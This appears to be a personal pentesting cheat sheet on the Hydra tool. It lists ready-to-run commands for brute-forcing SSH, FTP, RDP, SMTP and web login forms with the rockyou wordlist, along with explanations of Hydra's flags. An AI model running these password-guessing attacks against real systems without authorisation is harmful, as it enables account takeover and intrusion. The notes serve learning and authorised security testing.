hydra
Hydra (9.0k β) is a well-known tool to brute force authentication services such SSH, FTP, RDP, MySQL... It can even be used on login forms too, but that's uncommon.
$ wordlist=/usr/share/wordlists/rockyou.txt
# use ssh, ftp...
$ hydra -l username -P $wordlist ssh://IP
$ hydra -l username -P $wordlist ssh://IP:port
$ hydra -l username -P $wordlist ftp://IP
$ hydra -l username -P $wordlist rdp://IP
$ hydra -l xxx@xxx.xxx -P $wordlist smtp://IP
$ [...]
# alternate form
$ hydra -l username -P $wordlist IP ssh -s port
β‘οΈ I use a variable $wordlist
to write shorter commands.
You can learn more about wordlists here ποΈ.
β οΈ If you don't provide an username, hydra will try to find as many working credentials as possible. To stop at the first one, use -f
.
-
-l username
: try this username -
-L file
: try a list of usernames -
-p password
: try this password -
-P file
: try a list of passwords -
-C file
: instead of L/P, provide a list of "username:password" -
-s port
: use another port -
-t n
: use $n$ threads (default: 16) |4
for services -
-v
/-d
: verbose / debug -
-V
: show login+password for every attempt -
-e [values]
such as-e nsr
for all three-
n
: try null password -
s
: try login as pass -
r
: try reversed login
-
-
-f
: quit on first log in found -
-u
: try all usernames for each password
Special uses
form brute force
Try to brute force the account "toto". ^USER^
/^PASS^
mean replace with the username/password. username=
/password=
are the name of the fields. F=
is a word in the answer indicates a failure. See also: S=
.
$ hydra -l toto -P wordlist IP http-get-form "/login.php:username=^USER^&password=^PASS^:F=incorrect" -V
$ hydra -l toto -P wordlist IP http-post-form "/login.php:username=^USER^&password=^PASS^:F=incorrect" -V
π» To-do π»
Stuff that I found, but never read/used yet.
- HTTP Basic Auth:
[...] IP http-get /